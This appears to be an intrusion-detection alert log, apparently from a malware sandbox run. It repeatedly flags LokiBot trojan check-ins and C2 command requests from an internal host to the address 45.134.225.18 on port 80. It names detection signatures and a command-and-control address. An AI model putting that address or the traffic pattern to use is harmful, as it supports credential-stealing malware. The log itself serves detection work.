                12/03/20-09:59:37.489367TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996280192.168.2.545.134.225.18
                12/03/20-09:59:37.489367TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996280192.168.2.545.134.225.18
                12/03/20-09:59:37.489367TCP2025381ET TROJAN LokiBot Checkin4996280192.168.2.545.134.225.18
                12/03/20-09:59:37.489367TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996280192.168.2.545.134.225.18
                12/03/20-09:59:37.782964TCP2570WEB-MISC Invalid HTTP Version String4996380192.168.2.545.134.225.18
                12/03/20-09:59:37.782964TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996380192.168.2.545.134.225.18
                12/03/20-09:59:37.782964TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996380192.168.2.545.134.225.18
                12/03/20-09:59:37.782964TCP2025381ET TROJAN LokiBot Checkin4996380192.168.2.545.134.225.18
                12/03/20-09:59:37.782964TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996380192.168.2.545.134.225.18
                12/03/20-09:59:38.056303TCP2570WEB-MISC Invalid HTTP Version String4996480192.168.2.545.134.225.18
                12/03/20-09:59:38.056303TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996480192.168.2.545.134.225.18
                12/03/20-09:59:38.056303TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996480192.168.2.545.134.225.18
                12/03/20-09:59:38.056303TCP2025381ET TROJAN LokiBot Checkin4996480192.168.2.545.134.225.18
                12/03/20-09:59:38.056303TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996480192.168.2.545.134.225.18
                12/03/20-09:59:38.334555TCP2570WEB-MISC Invalid HTTP Version String4996580192.168.2.545.134.225.18
                12/03/20-09:59:38.334555TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996580192.168.2.545.134.225.18
                12/03/20-09:59:38.334555TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996580192.168.2.545.134.225.18
                12/03/20-09:59:38.334555TCP2025381ET TROJAN LokiBot Checkin4996580192.168.2.545.134.225.18
                12/03/20-09:59:38.334555TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996580192.168.2.545.134.225.18
                12/03/20-09:59:38.617674TCP2570WEB-MISC Invalid HTTP Version String4996680192.168.2.545.134.225.18
                12/03/20-09:59:38.617674TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996680192.168.2.545.134.225.18
                12/03/20-09:59:38.617674TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996680192.168.2.545.134.225.18
                12/03/20-09:59:38.617674TCP2025381ET TROJAN LokiBot Checkin4996680192.168.2.545.134.225.18
                12/03/20-09:59:38.617674TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996680192.168.2.545.134.225.18
                12/03/20-09:59:38.906286TCP2570WEB-MISC Invalid HTTP Version String4996780192.168.2.545.134.225.18
                12/03/20-09:59:38.906286TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996780192.168.2.545.134.225.18
                12/03/20-09:59:38.906286TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996780192.168.2.545.134.225.18
                12/03/20-09:59:38.906286TCP2025381ET TROJAN LokiBot Checkin4996780192.168.2.545.134.225.18
                12/03/20-09:59:38.906286TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996780192.168.2.545.134.225.18
                12/03/20-09:59:39.184627TCP2570WEB-MISC Invalid HTTP Version String4996880192.168.2.545.134.225.18
                12/03/20-09:59:39.184627TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996880192.168.2.545.134.225.18
                12/03/20-09:59:39.184627TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996880192.168.2.545.134.225.18
                12/03/20-09:59:39.184627TCP2025381ET TROJAN LokiBot Checkin4996880192.168.2.545.134.225.18
                12/03/20-09:59:39.184627TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996880192.168.2.545.134.225.18
                12/03/20-09:59:39.464467TCP2570WEB-MISC Invalid HTTP Version String4996980192.168.2.545.134.225.18
                12/03/20-09:59:39.464467TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996980192.168.2.545.134.225.18
                12/03/20-09:59:39.464467TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996980192.168.2.545.134.225.18
                12/03/20-09:59:39.464467TCP2025381ET TROJAN LokiBot Checkin4996980192.168.2.545.134.225.18
                12/03/20-09:59:39.464467TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996980192.168.2.545.134.225.18
                12/03/20-09:59:39.748389TCP2570WEB-MISC Invalid HTTP Version String4997080192.168.2.545.134.225.18
                12/03/20-09:59:39.748389TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997080192.168.2.545.134.225.18
                12/03/20-09:59:39.748389TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997080192.168.2.545.134.225.18
                12/03/20-09:59:39.748389TCP2025381ET TROJAN LokiBot Checkin4997080192.168.2.545.134.225.18
                12/03/20-09:59:39.748389TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997080192.168.2.545.134.225.18
                12/03/20-09:59:40.033652TCP2570WEB-MISC Invalid HTTP Version String4997180192.168.2.545.134.225.18
                12/03/20-09:59:40.033652TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997180192.168.2.545.134.225.18
                12/03/20-09:59:40.033652TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997180192.168.2.545.134.225.18
                12/03/20-09:59:40.033652TCP2025381ET TROJAN LokiBot Checkin4997180192.168.2.545.134.225.18
                12/03/20-09:59:40.033652TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997180192.168.2.545.134.225.18
                12/03/20-09:59:40.310056TCP2570WEB-MISC Invalid HTTP Version String4997280192.168.2.545.134.225.18
                12/03/20-09:59:40.310056TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997280192.168.2.545.134.225.18
                12/03/20-09:59:40.310056TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997280192.168.2.545.134.225.18
                12/03/20-09:59:40.310056TCP2025381ET TROJAN LokiBot Checkin4997280192.168.2.545.134.225.18
                12/03/20-09:59:40.310056TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997280192.168.2.545.134.225.18
                12/03/20-09:59:40.590570TCP2570WEB-MISC Invalid HTTP Version String4997480192.168.2.545.134.225.18
                12/03/20-09:59:40.590570TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997480192.168.2.545.134.225.18
                12/03/20-09:59:40.590570TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997480192.168.2.545.134.225.18
                12/03/20-09:59:40.590570TCP2025381ET TROJAN LokiBot Checkin4997480192.168.2.545.134.225.18
                12/03/20-09:59:40.590570TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997480192.168.2.545.134.225.18
                12/03/20-09:59:40.889750TCP2570WEB-MISC Invalid HTTP Version String4997580192.168.2.545.134.225.18
                12/03/20-09:59:40.889750TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997580192.168.2.545.134.225.18
                12/03/20-09:59:40.889750TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997580192.168.2.545.134.225.18
                12/03/20-09:59:40.889750TCP2025381ET TROJAN LokiBot Checkin4997580192.168.2.545.134.225.18
                12/03/20-09:59:40.889750TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997580192.168.2.545.134.225.18
                12/03/20-09:59:41.171174TCP2570WEB-MISC Invalid HTTP Version String4997680192.168.2.545.134.225.18
                12/03/20-09:59:41.171174TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997680192.168.2.545.134.225.18
                12/03/20-09:59:41.171174TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997680192.168.2.545.134.225.18
                12/03/20-09:59:41.171174TCP2025381ET TROJAN LokiBot Checkin4997680192.168.2.545.134.225.18
                12/03/20-09:59:41.171174TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997680192.168.2.545.134.225.18
                12/03/20-09:59:41.449700TCP2570WEB-MISC Invalid HTTP Version String4997780192.168.2.545.134.225.18
                12/03/20-09:59:41.449700TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997780192.168.2.545.134.225.18
                12/03/20-09:59:41.449700TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997780192.168.2.545.134.225.18
                12/03/20-09:59:41.449700TCP2025381ET TROJAN LokiBot Checkin4997780192.168.2.545.134.225.18
                12/03/20-09:59:41.449700TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997780192.168.2.545.134.225.18
                12/03/20-09:59:41.728734TCP2570WEB-MISC Invalid HTTP Version String4997880192.168.2.545.134.225.18
                12/03/20-09:59:41.728734TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997880192.168.2.545.134.225.18
                12/03/20-09:59:41.728734TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997880192.168.2.545.134.225.18
                12/03/20-09:59:41.728734TCP2025381ET TROJAN LokiBot Checkin4997880192.168.2.545.134.225.18
                12/03/20-09:59:41.728734TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997880192.168.2.545.134.225.18
                12/03/20-09:59:42.010089TCP2570WEB-MISC Invalid HTTP Version String4997980192.168.2.545.134.225.18
                12/03/20-09:59:42.010089TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997980192.168.2.545.134.225.18
                12/03/20-09:59:42.010089TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997980192.168.2.545.134.225.18
                12/03/20-09:59:42.010089TCP2025381ET TROJAN LokiBot Checkin4997980192.168.2.545.134.225.18
                12/03/20-09:59:42.010089TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997980192.168.2.545.134.225.18
                12/03/20-09:59:42.288776TCP2570WEB-MISC Invalid HTTP Version String4998080192.168.2.545.134.225.18
                12/03/20-09:59:42.288776TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998080192.168.2.545.134.225.18
                12/03/20-09:59:42.288776TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998080192.168.2.545.134.225.18
                12/03/20-09:59:42.288776TCP2025381ET TROJAN LokiBot Checkin4998080192.168.2.545.134.225.18
                12/03/20-09:59:42.288776TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998080192.168.2.545.134.225.18
                12/03/20-09:59:42.578722TCP2570WEB-MISC Invalid HTTP Version String4998180192.168.2.545.134.225.18
                12/03/20-09:59:42.578722TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998180192.168.2.545.134.225.18
                12/03/20-09:59:42.578722TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998180192.168.2.545.134.225.18
                12/03/20-09:59:42.578722TCP2025381ET TROJAN LokiBot Checkin4998180192.168.2.545.134.225.18
                12/03/20-09:59:42.578722TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998180192.168.2.545.134.225.18
                12/03/20-09:59:42.848082TCP2570WEB-MISC Invalid HTTP Version String4998280192.168.2.545.134.225.18
                12/03/20-09:59:42.848082TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998280192.168.2.545.134.225.18
                12/03/20-09:59:42.848082TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998280192.168.2.545.134.225.18
                12/03/20-09:59:42.848082TCP2025381ET TROJAN LokiBot Checkin4998280192.168.2.545.134.225.18
                12/03/20-09:59:42.848082TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998280192.168.2.545.134.225.18
                12/03/20-09:59:43.133197TCP2570WEB-MISC Invalid HTTP Version String4998380192.168.2.545.134.225.18
                12/03/20-09:59:43.133197TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998380192.168.2.545.134.225.18
                12/03/20-09:59:43.133197TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998380192.168.2.545.134.225.18
                12/03/20-09:59:43.133197TCP2025381ET TROJAN LokiBot Checkin4998380192.168.2.545.134.225.18
                12/03/20-09:59:43.133197TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998380192.168.2.545.134.225.18
                12/03/20-09:59:43.417986TCP2570WEB-MISC Invalid HTTP Version String4998480192.168.2.545.134.225.18
                12/03/20-09:59:43.417986TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998480192.168.2.545.134.225.18
                12/03/20-09:59:43.417986TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998480192.168.2.545.134.225.18
                12/03/20-09:59:43.417986TCP2025381ET TROJAN LokiBot Checkin4998480192.168.2.545.134.225.18
                12/03/20-09:59:43.417986TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998480192.168.2.545.134.225.18
                12/03/20-09:59:43.710847TCP2570WEB-MISC Invalid HTTP Version String4998580192.168.2.545.134.225.18
                12/03/20-09:59:43.710847TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998580192.168.2.545.134.225.18
                12/03/20-09:59:43.710847TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998580192.168.2.545.134.225.18
                12/03/20-09:59:43.710847TCP2025381ET TROJAN LokiBot Checkin4998580192.168.2.545.134.225.18
                12/03/20-09:59:43.710847TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998580192.168.2.545.134.225.18
                12/03/20-09:59:43.995666TCP2570WEB-MISC Invalid HTTP Version String4998680192.168.2.545.134.225.18
                12/03/20-09:59:43.995666TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998680192.168.2.545.134.225.18
                12/03/20-09:59:43.995666TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998680192.168.2.545.134.225.18
                12/03/20-09:59:43.995666TCP2025381ET TROJAN LokiBot Checkin4998680192.168.2.545.134.225.18
                12/03/20-09:59:43.995666TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998680192.168.2.545.134.225.18
                12/03/20-09:59:44.277936TCP2570WEB-MISC Invalid HTTP Version String4998780192.168.2.545.134.225.18
                12/03/20-09:59:44.277936TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998780192.168.2.545.134.225.18
                12/03/20-09:59:44.277936TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998780192.168.2.545.134.225.18
                12/03/20-09:59:44.277936TCP2025381ET TROJAN LokiBot Checkin4998780192.168.2.545.134.225.18
                12/03/20-09:59:44.277936TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998780192.168.2.545.134.225.18
                12/03/20-09:59:44.555013TCP2570WEB-MISC Invalid HTTP Version String4998880192.168.2.545.134.225.18
                12/03/20-09:59:44.555013TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998880192.168.2.545.134.225.18
                12/03/20-09:59:44.555013TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998880192.168.2.545.134.225.18
                12/03/20-09:59:44.555013TCP2025381ET TROJAN LokiBot Checkin4998880192.168.2.545.134.225.18
                12/03/20-09:59:44.555013TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998880192.168.2.545.134.225.18
                12/03/20-09:59:44.834102TCP2570WEB-MISC Invalid HTTP Version String4998980192.168.2.545.134.225.18
                12/03/20-09:59:44.834102TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998980192.168.2.545.134.225.18
                12/03/20-09:59:44.834102TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998980192.168.2.545.134.225.18
                12/03/20-09:59:44.834102TCP2025381ET TROJAN LokiBot Checkin4998980192.168.2.545.134.225.18
                12/03/20-09:59:44.834102TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998980192.168.2.545.134.225.18
                12/03/20-09:59:45.128822TCP2570WEB-MISC Invalid HTTP Version String4999080192.168.2.545.134.225.18
                12/03/20-09:59:45.128822TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999080192.168.2.545.134.225.18
                12/03/20-09:59:45.128822TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999080192.168.2.545.134.225.18
                12/03/20-09:59:45.128822TCP2025381ET TROJAN LokiBot Checkin4999080192.168.2.545.134.225.18
                12/03/20-09:59:45.128822TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999080192.168.2.545.134.225.18
                12/03/20-09:59:45.405404TCP2570WEB-MISC Invalid HTTP Version String4999180192.168.2.545.134.225.18
                12/03/20-09:59:45.405404TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999180192.168.2.545.134.225.18
                12/03/20-09:59:45.405404TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999180192.168.2.545.134.225.18
                12/03/20-09:59:45.405404TCP2025381ET TROJAN LokiBot Checkin4999180192.168.2.545.134.225.18
                12/03/20-09:59:45.405404TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999180192.168.2.545.134.225.18
                12/03/20-09:59:45.684462TCP2570WEB-MISC Invalid HTTP Version String4999280192.168.2.545.134.225.18
                12/03/20-09:59:45.684462TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999280192.168.2.545.134.225.18
                12/03/20-09:59:45.684462TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999280192.168.2.545.134.225.18
                12/03/20-09:59:45.684462TCP2025381ET TROJAN LokiBot Checkin4999280192.168.2.545.134.225.18
                12/03/20-09:59:45.684462TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999280192.168.2.545.134.225.18
                12/03/20-09:59:45.966853TCP2570WEB-MISC Invalid HTTP Version String4999380192.168.2.545.134.225.18
                12/03/20-09:59:45.966853TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999380192.168.2.545.134.225.18
                12/03/20-09:59:45.966853TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999380192.168.2.545.134.225.18
                12/03/20-09:59:45.966853TCP2025381ET TROJAN LokiBot Checkin4999380192.168.2.545.134.225.18
                12/03/20-09:59:45.966853TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999380192.168.2.545.134.225.18
                12/03/20-09:59:46.246000TCP2570WEB-MISC Invalid HTTP Version String4999480192.168.2.545.134.225.18
                12/03/20-09:59:46.246000TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999480192.168.2.545.134.225.18
                12/03/20-09:59:46.246000TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999480192.168.2.545.134.225.18
                12/03/20-09:59:46.246000TCP2025381ET TROJAN LokiBot Checkin4999480192.168.2.545.134.225.18
                12/03/20-09:59:46.246000TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999480192.168.2.545.134.225.18
                12/03/20-09:59:46.537154TCP2570WEB-MISC Invalid HTTP Version String4999580192.168.2.545.134.225.18
                12/03/20-09:59:46.537154TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999580192.168.2.545.134.225.18
                12/03/20-09:59:46.537154TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999580192.168.2.545.134.225.18
                12/03/20-09:59:46.537154TCP2025381ET TROJAN LokiBot Checkin4999580192.168.2.545.134.225.18
                12/03/20-09:59:46.537154TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999580192.168.2.545.134.225.18
                12/03/20-09:59:46.828926TCP2570WEB-MISC Invalid HTTP Version String4999680192.168.2.545.134.225.18
                12/03/20-09:59:46.828926TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999680192.168.2.545.134.225.18
                12/03/20-09:59:46.828926TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999680192.168.2.545.134.225.18
                12/03/20-09:59:46.828926TCP2025381ET TROJAN LokiBot Checkin4999680192.168.2.545.134.225.18
                12/03/20-09:59:46.828926TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999680192.168.2.545.134.225.18
                12/03/20-09:59:47.104096TCP2570WEB-MISC Invalid HTTP Version String4999780192.168.2.545.134.225.18
                12/03/20-09:59:47.104096TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999780192.168.2.545.134.225.18
                12/03/20-09:59:47.104096TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999780192.168.2.545.134.225.18
                12/03/20-09:59:47.104096TCP2025381ET TROJAN LokiBot Checkin4999780192.168.2.545.134.225.18
                12/03/20-09:59:47.104096TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999780192.168.2.545.134.225.18
                12/03/20-09:59:47.388203TCP2570WEB-MISC Invalid HTTP Version String4999880192.168.2.545.134.225.18
                12/03/20-09:59:47.388203TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999880192.168.2.545.134.225.18
                12/03/20-09:59:47.388203TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999880192.168.2.545.134.225.18
                12/03/20-09:59:47.388203TCP2025381ET TROJAN LokiBot Checkin4999880192.168.2.545.134.225.18
                12/03/20-09:59:47.388203TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999880192.168.2.545.134.225.18
                12/03/20-09:59:47.660514TCP2570WEB-MISC Invalid HTTP Version String4999980192.168.2.545.134.225.18
                12/03/20-09:59:47.660514TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999980192.168.2.545.134.225.18
                12/03/20-09:59:47.660514TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999980192.168.2.545.134.225.18
                12/03/20-09:59:47.660514TCP2025381ET TROJAN LokiBot Checkin4999980192.168.2.545.134.225.18
                12/03/20-09:59:47.660514TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999980192.168.2.545.134.225.18
                12/03/20-09:59:47.922003TCP2570WEB-MISC Invalid HTTP Version String5000080192.168.2.545.134.225.18
                12/03/20-09:59:47.922003TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000080192.168.2.545.134.225.18
                12/03/20-09:59:47.922003TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000080192.168.2.545.134.225.18
                12/03/20-09:59:47.922003TCP2025381ET TROJAN LokiBot Checkin5000080192.168.2.545.134.225.18
                12/03/20-09:59:47.922003TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000080192.168.2.545.134.225.18
                12/03/20-09:59:48.214298TCP2570WEB-MISC Invalid HTTP Version String5000180192.168.2.545.134.225.18
                12/03/20-09:59:48.214298TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000180192.168.2.545.134.225.18
                12/03/20-09:59:48.214298TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000180192.168.2.545.134.225.18
                12/03/20-09:59:48.214298TCP2025381ET TROJAN LokiBot Checkin5000180192.168.2.545.134.225.18
                12/03/20-09:59:48.214298TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000180192.168.2.545.134.225.18
                12/03/20-09:59:48.501652TCP2570WEB-MISC Invalid HTTP Version String5000280192.168.2.545.134.225.18
                12/03/20-09:59:48.501652TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000280192.168.2.545.134.225.18
                12/03/20-09:59:48.501652TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000280192.168.2.545.134.225.18
                12/03/20-09:59:48.501652TCP2025381ET TROJAN LokiBot Checkin5000280192.168.2.545.134.225.18
                12/03/20-09:59:48.501652TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000280192.168.2.545.134.225.18
                12/03/20-09:59:48.792500TCP2570WEB-MISC Invalid HTTP Version String5000380192.168.2.545.134.225.18
                12/03/20-09:59:48.792500TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000380192.168.2.545.134.225.18
                12/03/20-09:59:48.792500TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000380192.168.2.545.134.225.18
                12/03/20-09:59:48.792500TCP2025381ET TROJAN LokiBot Checkin5000380192.168.2.545.134.225.18
                12/03/20-09:59:48.792500TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000380192.168.2.545.134.225.18
                12/03/20-09:59:49.071201TCP2570WEB-MISC Invalid HTTP Version String5000480192.168.2.545.134.225.18
                12/03/20-09:59:49.071201TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000480192.168.2.545.134.225.18
                12/03/20-09:59:49.071201TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000480192.168.2.545.134.225.18
                12/03/20-09:59:49.071201TCP2025381ET TROJAN LokiBot Checkin5000480192.168.2.545.134.225.18
                12/03/20-09:59:49.071201TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000480192.168.2.545.134.225.18
                12/03/20-09:59:49.357742TCP2570WEB-MISC Invalid HTTP Version String5000580192.168.2.545.134.225.18
                12/03/20-09:59:49.357742TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000580192.168.2.545.134.225.18
                12/03/20-09:59:49.357742TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000580192.168.2.545.134.225.18
                12/03/20-09:59:49.357742TCP2025381ET TROJAN LokiBot Checkin5000580192.168.2.545.134.225.18
                12/03/20-09:59:49.357742TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000580192.168.2.545.134.225.18
                12/03/20-09:59:49.634615TCP2570WEB-MISC Invalid HTTP Version String5000680192.168.2.545.134.225.18
                12/03/20-09:59:49.634615TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000680192.168.2.545.134.225.18
                12/03/20-09:59:49.634615TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000680192.168.2.545.134.225.18
                12/03/20-09:59:49.634615TCP2025381ET TROJAN LokiBot Checkin5000680192.168.2.545.134.225.18
                12/03/20-09:59:49.634615TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000680192.168.2.545.134.225.18
                12/03/20-09:59:49.924174TCP2570WEB-MISC Invalid HTTP Version String5000780192.168.2.545.134.225.18
                12/03/20-09:59:49.924174TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000780192.168.2.545.134.225.18
                12/03/20-09:59:49.924174TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000780192.168.2.545.134.225.18
                12/03/20-09:59:49.924174TCP2025381ET TROJAN LokiBot Checkin5000780192.168.2.545.134.225.18
                12/03/20-09:59:49.924174TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000780192.168.2.545.134.225.18
                12/03/20-09:59:50.203157TCP2570WEB-MISC Invalid HTTP Version String5000880192.168.2.545.134.225.18
                12/03/20-09:59:50.203157TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000880192.168.2.545.134.225.18
                12/03/20-09:59:50.203157TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000880192.168.2.545.134.225.18
                12/03/20-09:59:50.203157TCP2025381ET TROJAN LokiBot Checkin5000880192.168.2.545.134.225.18
                12/03/20-09:59:50.203157TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000880192.168.2.545.134.225.18
                12/03/20-09:59:50.474940TCP2570WEB-MISC Invalid HTTP Version String5000980192.168.2.545.134.225.18
                12/03/20-09:59:50.474940TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000980192.168.2.545.134.225.18
                12/03/20-09:59:50.474940TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000980192.168.2.545.134.225.18
                12/03/20-09:59:50.474940TCP2025381ET TROJAN LokiBot Checkin5000980192.168.2.545.134.225.18
                12/03/20-09:59:50.474940TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000980192.168.2.545.134.225.18
                12/03/20-09:59:50.767015TCP2570WEB-MISC Invalid HTTP Version String5001080192.168.2.545.134.225.18
                12/03/20-09:59:50.767015TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001080192.168.2.545.134.225.18
                12/03/20-09:59:50.767015TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001080192.168.2.545.134.225.18
                12/03/20-09:59:50.767015TCP2025381ET TROJAN LokiBot Checkin5001080192.168.2.545.134.225.18
                12/03/20-09:59:50.767015TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001080192.168.2.545.134.225.18
                12/03/20-09:59:51.041356TCP2570WEB-MISC Invalid HTTP Version String5001180192.168.2.545.134.225.18
                12/03/20-09:59:51.041356TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001180192.168.2.545.134.225.18
                12/03/20-09:59:51.041356TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001180192.168.2.545.134.225.18
                12/03/20-09:59:51.041356TCP2025381ET TROJAN LokiBot Checkin5001180192.168.2.545.134.225.18
                12/03/20-09:59:51.041356TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001180192.168.2.545.134.225.18
                12/03/20-09:59:51.325003TCP2570WEB-MISC Invalid HTTP Version String5001280192.168.2.545.134.225.18
                12/03/20-09:59:51.325003TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001280192.168.2.545.134.225.18
                12/03/20-09:59:51.325003TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001280192.168.2.545.134.225.18
                12/03/20-09:59:51.325003TCP2025381ET TROJAN LokiBot Checkin5001280192.168.2.545.134.225.18
                12/03/20-09:59:51.325003TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001280192.168.2.545.134.225.18
                12/03/20-09:59:51.605096TCP2570WEB-MISC Invalid HTTP Version String5001380192.168.2.545.134.225.18
